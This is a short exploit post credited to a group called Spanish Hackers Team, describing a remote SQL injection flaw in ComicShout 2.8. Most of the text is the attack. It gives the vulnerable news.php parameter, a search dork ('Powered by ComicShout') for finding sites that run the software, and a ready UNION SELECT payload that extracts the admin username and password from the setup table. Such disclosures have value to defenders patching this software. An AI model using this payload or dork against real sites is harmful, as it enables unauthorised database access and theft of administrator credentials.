--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability +==-- --==+====================================================================================+==-- - dreaming of necessity is reason to comply - [+] Info: [~] Bug found by JosS [~] sys-project[at]hotmail.com [~] http://www.spanish-hackers.com [~] EspSeC & Hack0wn!. [~] Software: ComicShout 2.8 [~] Exploit: Remote SQL Injection [High] [~] Vuln file: news.php [~] Dork: "Powered by ComicShout" [+] Exploit: [~] /news.php?news_id=[SQL] [~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/* --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End]